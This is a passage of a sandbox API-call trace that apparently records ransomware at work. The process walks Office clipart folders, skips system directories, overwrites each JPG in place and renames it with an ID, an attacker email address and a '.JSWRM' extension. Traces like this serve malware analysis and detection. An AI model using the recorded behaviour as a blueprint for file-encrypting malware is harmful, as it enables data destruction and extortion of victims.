returned 1 [0082.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.946] CloseHandle (hObject=0x314) returned 1 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0082.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0082.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0082.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0082.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.946] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.947] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5285, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145361.JPG", cAlternateFileName="")) returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2=".") returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="..") returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="...") returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="windows") returned -1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="recovery") returned -1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="perflogs") returned -1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="documents and settings") returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="system volume information") returned -1 [0082.947] lstrcmpiW (lpString1="J0145361.JPG", lpString2="msocache") returned -1 [0082.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145361.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145361.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145361.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145361.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145361.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145361.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.948] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21125) returned 1 [0082.948] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5280) returned 0x24d210 [0082.949] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5280, lpOverlapped=0x0) returned 1 [0082.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.994] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5280, lpOverlapped=0x0) returned 1 [0082.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.995] CloseHandle (hObject=0x314) returned 1 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0082.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0082.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0082.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0082.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.995] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0082.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.996] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45cb, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145373.JPG", cAlternateFileName="")) returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2=".") returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="..") returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="...") returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="windows") returned -1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="recovery") returned -1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="perflogs") returned -1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="documents and settings") returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="system volume information") returned -1 [0082.996] lstrcmpiW (lpString1="J0145373.JPG", lpString2="msocache") returned -1 [0082.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145373.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145373.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145373.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0082.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145373.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145373.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145373.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0082.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0082.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.998] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17867) returned 1 [0082.998] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45c0) returned 0x24d210 [0082.998] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45c0, lpOverlapped=0x0) returned 1 [0083.001] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.001] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45c0, lpOverlapped=0x0) returned 1 [0083.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.001] CloseHandle (hObject=0x314) returned 1 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0083.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0083.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0083.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0083.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.001] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0083.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0083.002] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c6a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145669.JPG", cAlternateFileName="")) returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2=".") returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="..") returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="...") returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="windows") returned -1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="recovery") returned -1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="perflogs") returned -1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="documents and settings") returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="system volume information") returned -1 [0083.002] lstrcmpiW (lpString1="J0145669.JPG", lpString2="msocache") returned -1 [0083.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.002] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145669.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145669.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145669.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0083.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145669.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145669.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145669.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0083.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0083.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.003] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31850) returned 1 [0083.003] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c60) returned 0x24d210 [0083.003] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c60, lpOverlapped=0x0) returned 1 [0083.007] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.007] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c60, lpOverlapped=0x0) returned 1 [0083.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.008] CloseHandle (hObject=0x314) returned 1 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0083.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0083.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0083.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0083.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0083.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.008] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg"), 